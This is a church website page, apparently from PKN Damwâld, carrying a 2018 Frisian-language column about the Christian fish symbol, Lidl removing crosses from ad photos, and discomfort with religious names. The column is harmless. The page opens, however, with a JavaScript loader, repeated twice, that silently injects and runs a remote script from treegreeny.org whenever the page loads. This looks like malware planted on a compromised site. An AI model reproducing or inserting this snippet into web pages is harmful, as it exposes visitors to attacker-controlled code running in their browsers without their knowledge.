;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); In Krùs…….. - PKN Damwâld

In Krùs……..

Gepubliceerd op: dinsdag 6 februari 2018

Soms sjogge jo ien foar jo riden, in auto mei op’e achterkânt in ôfbeelding fan in fisk. Dermei wurd oanjoun dat beriders fan’e auto kristen bin of,better sein, dat besykje te wèzen. De eerste Kristenen hienen it teken op’e doarpost fan it hûs; se waarden ûnderdrukt troch de Romeinen mar lieten troch dat teken op de doarpost nei elkoar ta witte; Wy stean foar ùs leauwen!. It Griekse wurd foar fisk is Ichtus en it bestjut: Jezus Kristus, soan fan God, Rèdder. Wat in lytse ôfbylding al net sizze kin! Wy wurde net ûnderdrukt yn it frije westen, teminsten net yn de letterlike sin, mar toch:
In skoftke lyn hie de Lidl yn ien fan har reklamefolders mei Griekse producten âlle foto’s fan it Griekse eilân Santorini sa bewurke, dat âlle krùsen op’e gebouwen fan it eilân fuort fotoshopt wiene , oftewol gjin krùs mear te sjen!! De Lidle is fansels bang dat se omzet misrinne, as groepen minsken har ergerje oan dat teken fan it Kristendom. Dus fuortmoffelje dat spul, want penning sechstjin is baas!! Mei in reklamefolder oer Italië itselde recept; Krùsen fuort!!
No is it fan Grifformearden bikend dat se nogal op’e sinten bin, en dus meie nochal wat fan harren graag “Lidl-je”, ek al ha de measten noch nooit jildpine hân, mar hawar, dan mar in krùs minder……..
Ùt eigen ûnderfining; Wy mochten in prachtig nijjierskonsert fat it musykkorps Ere Zij God meimeitsje (yn de krúswei!!!). In dei as wat letter rekke ik mei immen oan’e praat oer die mooie jûn, Hy bearde wakker oer de mooie musyk en de noflike jûn, yn ien wurd geweldig! Mar ien ding moat wol oars sei er tsjin my; dy namme fan it korps, Ere Zij God, dèr mat se gau mei ophâlde. Dat kin dochs net mear yn dizze tiid!…………!???

Columnist:Sietse

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns